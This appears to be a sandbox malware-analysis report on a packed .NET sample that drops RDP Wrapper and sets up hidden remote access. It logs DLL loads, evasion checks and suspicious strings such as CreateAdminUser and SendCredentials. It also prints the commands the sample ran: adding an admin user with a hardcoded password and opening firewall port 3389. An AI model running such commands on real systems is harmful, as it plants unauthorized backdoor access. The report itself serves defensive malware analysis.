                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressedlB source: file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdbJ source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed source: file.exe
                            Source: Binary string: RfxVmt.pdb source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdb source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1Nullable`1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<faker>5__2<>u__2Func`2Dictionary`2ToInt64<Main>d__4get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.bogus.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNameLastNameFirstNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__builderGendersenderManagementObjectSearcherFakerResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessBogus.DataSetsSystem.Net.SocketsExistsB
                            Source: Binary string: RfxVmt.pdbGCTL source: file.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rfxvmt.dll.4.dr, RDPWInst.exe.1.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: file.exe
                            Source: Binary string: /_/Source/Bogus/obj/Release/net40/Bogus.pdbSHA256v0& source: file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: file.exe, QXNzZW1ibHlMb2FkZXJB.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                            Yara detected Costura Assembly Loader
                            Source: Yara matchFile source: file.exe, type: SAMPLE
                            Source: Yara matchFile source: 1.0.file.exe.6d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000001.00000000.1376199757.00000000006D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7404, type: MEMORYSTR
                            Source: file.exeStatic PE information: 0x880A0FF9 [Tue Apr 29 05:07:05 2042 UTC]
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01183F61 pushfd ; retf 0002h1_2_01183F62
                            Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01183FF9 pushfd ; retf 0002h1_2_01183FFA
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_004430DC push 00443161h; ret 4_2_00443159
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00439674 push ecx; mov dword ptr [esp], ecx4_2_00439675
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00420164 push 004201DAh; ret 4_2_004201D2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040A178 push 0040A1E7h; ret 4_2_0040A1DF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00437134 push 00437201h; ret 4_2_004371F9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00443188 push 00443230h; ret 4_2_00443228
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043421C push ecx; mov dword ptr [esp], edx4_2_0043421E
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0044323C push 004432C7h; ret 4_2_004432BF
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00437298 push 0043732Eh; ret 4_2_00437326
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00437360 push 004373ADh; ret 4_2_004373A5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043A3F8 push 0043A450h; ret 4_2_0043A448
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_004176D4 push 00417879h; ret 4_2_00417871
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00421998 push 004219E5h; ret 4_2_004219DD
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0042AA70 push ecx; mov dword ptr [esp], edx4_2_0042AA75
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040CA10 push eax; retf 0040h4_2_0040CA11
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0042AAB4 push ecx; mov dword ptr [esp], edx4_2_0042AAB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00415C58 push ecx; mov dword ptr [esp], edx4_2_00415C5D
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040EC80 push ecx; mov dword ptr [esp], ecx4_2_0040EC85
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00404E0C push eax; ret 4_2_00404E48
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043FE8C push 0043FEE0h; ret 4_2_0043FED8
                            Source: file.exeStatic PE information: section name: .text entropy: 7.995759768210477

                            Persistence and Installation Behavior

                            barindex
                            Adds a new user with administrator rights
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /addJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Windows\System32\drivers\tsusbhub.sysRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\WdfJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\ParametersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_0043B58C
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle,4_2_0043B7D4
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 3112Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 710Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exe TID: 7496Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 7536Thread sleep count: 3112 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 7540Thread sleep count: 710 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 8076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exe TID: 7496Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_004092D8 FindFirstFileW,FindClose,4_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_0040F73C FindFirstFileW,FindClose,4_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,4_2_00408EB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00409D02 GetSystemInfo,4_2_00409D02
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: file.exe, 00000001.00000002.1799416851.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                            Source: file.exe, 00000001.00000002.1800235734.0000000003001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.000000000300F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                            Source: net1.exe, 00000017.00000002.1745753972.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V AdministratorsA4VV
                            Source: net1.exe, 00000017.00000002.1745753972.0000000003108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                            Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user PansyBins WelTW4HnaKt3 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user PansyBins WelTW4HnaKt3 /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
